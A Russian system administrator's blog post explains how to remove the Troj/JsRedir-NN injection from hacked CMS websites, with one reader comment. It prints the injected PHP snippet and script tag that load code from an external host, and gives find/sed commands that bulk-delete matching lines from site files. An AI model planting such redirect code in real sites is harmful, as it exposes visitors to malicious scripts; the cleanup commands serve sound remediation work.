PrestaShop Theme

Блог о компьютерах, сетях, касперском, программном обеспечении

Блог системного администратора о сетях, компьютерах, передовых технологиях и многом ином
Как вылечить вирус Troj/JsRedir-NN

Как вылечить вирус Troj/JsRedir-NN

Вирус Troj/JsRedir-NN это не компьютерный вирус, а вирус взломавший ваш сайт.  У него есть множество модификаций, более ранних с которыми легко справлялись, однако Troj/JsRedir-NN более новая модификация , описания ее лечения еще нет в интернете и я собираюсь об этом написать в данной статье. 

Что такое Troj/JsRedir-NN

Итак данный вирус Troj/JsRedir-NN поражает в основном популярные CMS сайтов типа Joomla, WordPress и другие известные. По сути является перенаправлением на другой сайт вида :

<script type=»text/javascript» src=»http://areaftp.lasercom.it/test/cgi/cnrtjy89.php?id=8173931″></script>

В моем случае он поразил все php файлы движка, несколько .js файлов и даже несколько .html.

Лечение Troj/JsRedir-NN

Для лечения Troj/JsRedir-NN рассмотрим его подробнее. В PHP файлах он вставляется такой конструкцией, которая как мы видим вызывает сама себя, и вставляет кусок скрипта в любой файл КМС .

#14b77e#
if(empty($sjnqy)) {
$sjnqy = «<script type=\»text/javascript\» src=\»http://areaftp.lasercom.it/test/cgi/cnrtjy89.php?id=8172285\»></script>»;
echo $sjnqy;
}
#/14b77e#

 

По хорошему нам надо удалить 4 строчки между комментариями. Сделать это автоматически довольно сложно, так как в разных файлах вирус меняет вхождения окончания ?id=8172285 на любые цифры, в результате чего поиск строк не приведет к хорошему результату. Но наработанное решение есть. Если ваш хостинг поддерживает SSH  то вы можете избавится от вируса за 3 секунды, а именно, подключаетесь к серверу и задаете команду:

find -name ‘*.php’ -exec sed -i ‘/cnrtjy89/d’ {} \;

Таким образом мы ищем во всех php файлах вхождение строки cnrtjy89 что является уникальным вхождением вирусной строчки Troj/JsRedir-NN, врядли ваши скрипты на сайте используют похожую строку, иначе они тоже порежутся, после нахождения данной строки команда затирает всю строку целиком, в результате у нас остается:

#14b77e#
if(empty($sjnqy)) {

echo $sjnqy;
}
#/14b77e#

Что является абсолютно безвредным кодом. Далее то же самое можно сделать для всех js файлов, но для начала проверьте зараженные js файлы, возможно строка <script type=\»text/javascript\» src=\»http://areaftp.lasercom.it/test/cgi/cnrtjy89.php?id=8172285\»></script> добавлялась уже к какой то другой строке файла, таким образом у вас удалятся важные скрипты.

Строка для js:

find -name ‘*.js’ -exec sed -i ‘/cnrtjy89/d’ {} \;

Для окончательного добивания вируса заходим в панели вебмастера яндекс и гугл и отправляем сайт на перепроверку от вирусов, там же есть основные зараженные страницы, если сайт не вылечится целиком, то останется несколько страниц, которые надо будет проанализировать и повторно применить лечение. Возможно это какие то html страницы , из обычно немного и можно пролечить и в ручную.

После этого конечно же надо провести полную ревизию сайта на шеллы, с помощью скрипта AI-bolit либо любых других.

Один комментарий к записи “Как вылечить вирус Troj/JsRedir-NN”

  1. Андрей Зимин:

    Рейтинг: Thumb up 0 Thumb down 0

    Это все понятно, а как предотвратить его, что лучше установить?

    ОтветитьОтветить

Оставить комментарий